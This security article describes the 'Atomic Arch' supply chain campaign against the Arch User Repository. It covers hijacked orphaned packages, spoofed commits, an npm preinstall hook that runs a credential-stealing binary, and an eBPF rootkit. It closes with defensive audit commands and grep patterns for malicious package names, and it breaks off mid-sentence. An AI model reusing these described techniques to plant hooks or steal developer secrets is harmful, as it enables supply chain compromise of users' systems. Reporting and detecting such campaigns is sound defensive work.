The open-source software ecosystem relies on a delicate foundation of collective trust, peer review, and distributed responsibility. On June 11, 2026, that foundation was severely tested when security researchers identified a highly coordinated and expanding supply chain campaign targeting the Arch User Repository (AUR). Dubbed “Atomic Arch” by security labs, this sophisticated campaign has systematically compromised nearly 2,000 community-maintained software packages. This widespread Arch Linux attack has sent shockwaves through the Linux developer community, exposing critical systemic vulnerabilities in how third-party, community-driven software repositories govern package adoption, verify commit histories, and police pre-installation scripts.
Understanding the Vector: The Arch User Repository and Orphaned Packages
Unlike the core repositories of Arch Linux—which are heavily vetted and maintained by authorized developers—the Arch User Repository (AUR) is an unmoderated, community-driven catalog. It does not store pre-compiled binaries. Instead, it hosts user-submitted build recipes known as PKGBUILD files. These are shell scripts containing instructions on how to download, compile, and install third-party applications on the host system. AUR helpers like yay and paru automate the retrieval and execution of these scripts, compiling the code directly on the user’s local machine.
A longstanding feature of the AUR governance model is the concept of orphaned packages. If an original package maintainer becomes inactive, abandons a utility, or steps away from the community, the package is flagged as “orphaned”. Any registered AUR user can legally petition for ownership or adopt the project outright to keep it updated. The “Atomic Arch” threat actors weaponized this exact trust model. They systematically identified and adopted hundreds of abandoned packages, exploiting the lack of multi-factor verification or human oversight in the adoption process.
To deepen the deception, the attackers did not simply push updates under a newly registered alias. They spoofed Git commit metadata to make it appear as though the malicious updates were pushed by the project’s original, highly trusted, and long-standing maintainers. By altering the committer’s name and email (frequently changing them to spoofed domains like foryou[.]net or generic Gmail accounts), they bypassed the visual inspection of casual auditors. This left the target’s build history looking perfectly normal, successfully exploiting the developer trust model without needing to compromise the actual developer’s credentials.
The Mechanics of the First Wave: Arbitrary JS Execution
In the initial phase of the campaign, which began around June 11, 2026, the compromised PKGBUILD and associated .install scripts were modified to include a post-install or build-time hook. While users expected the script to fetch downstream C or Rust source code, compile it, and generate a local package, the altered build recipes executed JavaScript-based package managers. The compromised scripts quietly ran commands like npm install, bun install, or yarn to pull malicious packages directly from the public npm registry under the guise of dependency resolution.
The primary malicious packages identified in the first wave include:
atomic-lockfile(most notably version 1.4.2)lockfile-jsjs-digest(and its subsequent variant,digest-js)
To provide plausible cover, these rogue npm packages were often downloaded alongside legitimate node modules. However, the malicious packages carried a fatal instruction nested inside their package.json manifest: a "preinstall": "./src/hooks/deps" hook. The moment the JS package manager resolved the dependencies, the preinstall hook executed a bundled Linux ELF binary named deps. This bypassed any native sandbox protections, running compiled machine code directly on the build system.
Deep Dive Into the Payload: Infostealer and eBPF Rootkit
The compiled deps binary (determined by reverse-engineers to be compiled from Rust) was designed as a dual-mode payload. Its behavior diverged dramatically based on the permission level of the process executing the AUR compilation.
User-Space Credential Harvester
When executed with standard user privileges, the deps binary acted as an extremely aggressive information stealer. Rather than targeting generic consumer data, it specifically targeted developer workstations, local build environments, and system administrator assets. The malware systematically audited the victim’s filesystem to harvest the following data:
- Developer Secrets & Cloud Keys: GitHub SSH keys, npm publication tokens, HashiCorp Vault configurations, AWS credentials, and local Docker/Podman configuration profiles.
- Application Data: Browser cookies, Electron application databases, and local session tokens for communication platforms like Slack, Microsoft Teams, and Discord.
- System Footprints: Active shell histories (e.g.,
.bash_history,.zsh_history), VPN configuration files, SSH known hosts, and private key files.
Kernel-Space eBPF Rootkit
If the user compiled or installed the package using root privileges (which is common when installing system utilities or using poorly configured AUR helpers that escalate privileges), the malware took a far more dangerous path. It used its administrative authority to deploy an eBPF-based rootkit.
Extended Berkeley Packet Filter (eBPF) is a powerful technology built directly into the Linux kernel that allows sandboxed programs to run in response to specific kernel events. While typically used for high-performance networking and system observability, the “Atomic Arch” attackers used it for hyper-stealth persistence. Once loaded, the eBPF programs hooked critical kernel syscalls—such as directory listings, process signals, and network socket reads—to achieve absolute invisibility. The rootkit silently omitted its own process IDs, configuration files, and active Command and Control (C2) network connections from user-space reporting tools. As a result, standard security tools like ps, lsof, netstat, and even modern Endpoint Detection and Response (EDR) agents running on the system were completely blind to the intrusion.
The Evolution: The Stealthy Second Wave on June 14, 2026
By June 12, Arch Linux Trusted Users and package maintainers had actively begun deleting compromised packages, disabling the hijacked developer accounts, and cleaning the database. However, on June 14, 2026, the threat actors launched a highly coordinated second wave that circumvented the initial remediation efforts. This secondary wave pushed the number of compromised packages from the initial 400 to nearly 2,000.
In this second wave, the attackers completely abandoned the noisy, predictable pattern of calling npm install atomic-lockfile or bun install js-digest directly inside the PKGBUILD. Automated security scanners that the community had set up to search for these strings were instantly bypassed. Instead, the attackers implemented heavily obfuscated scripting within the .install files. This obfuscated code dropped a tiny, highly compressed, and seemingly benign program directly into the system’s temporary directory (usually /tmp). Once the installation concluded, this program was executed in the background. It quietly connected to external C2 servers, decrypted a secondary payload, and executed dynamic JavaScript code to install the rootkit and credential stealer post-installation. This decoupled delivery mechanism bypassed simple static checks, making analysis of the raw PKGBUILD files exceptionally difficult.
Downstream Impact of the Arch Linux Attack on Derivative Distributions
Because the AUR is the backbone for the extended Arch ecosystem, the fallout of this massive Arch Linux attack has spilled over into downstream distributions. Derivatives that rely directly or indirectly on AUR accessibility—such as CachyOS, EndeavourOS, Garuda Linux, and Manjaro Linux—have all issued urgent security bulletins. While these operating systems maintain their own repositories for core system packages, their users regularly use AUR helpers to install proprietary software, specialized gaming utilities, and developer tools. This has left their user bases equally vulnerable to system-wide compromises and silent kernel-level rootkits.
How to Audit, Mitigate, and Secure Your System
The Arch Linux community has responded with rapid development of decentralized auditing tools. Security researcher lenucksi, along with contributors from across the open-source community, consolidated various detection concepts into a comprehensive auditing utility: the aur-malware-check repository. This tool is designed to scan local installations, historical package manager logs, and kernel structures to locate indicators of compromise (IOCs).
Auditing Your Local Installation
To quickly check your local machine against known affected packages, users can run the following read-only commands in their terminal to query foreign packages and check them against the community-curated database of compromised packages:
# Step 1: Identify all locally installed foreign (AUR) packages
pacman -Qmq | sort > /tmp/local-aur.txt
# Step 2: Download the latest consolidated list of compromised package names
curl -fsS --proto '=https' https://raw.githubusercontent.com/lenucksi/aur-malware-check/master/package_list.txt | sort -u > /tmp/compromised-list.txt
# Step 3: Intersect the lists to see if you have any matches
comm -12 /tmp/local-aur.txt /tmp/compromised-list.txtFor a deeper system-level investigation, users should check their system logs for historical installations that may have been uninstalled or updated during the active infection window (starting June 9, 2026). Run the following commands to check your transaction logs and local directories:
# Search your pacman transaction log for malicious packages
grep -Ei "atomic-lockfile|js-digest|lockfile-js" /var/log/pacman.log
# Check your global npm and bun cache directories for malicious locks
grep -rl "atomic-lockfile" ~/.npm ~/.cache/yarn 2>/dev/nullChecking for Systemd Persistence and the eBPF Rootkit
The malware also attempts to persist by writing systemd services. You can scan for suspicious, rapid-restarting user services with the following command:
# Audit systemd unit configurations for malicious persistent loops
grep -RA1 'Restart=always' {/etc/systemd/system,~/.config/systemd/user/} 2>/dev/null | grep -B1 RestartSec=30Because the eBPF rootkit hides itself from standard process monitors, users must directly query the virtual filesystem where eBPF maps reside. Run the following command to check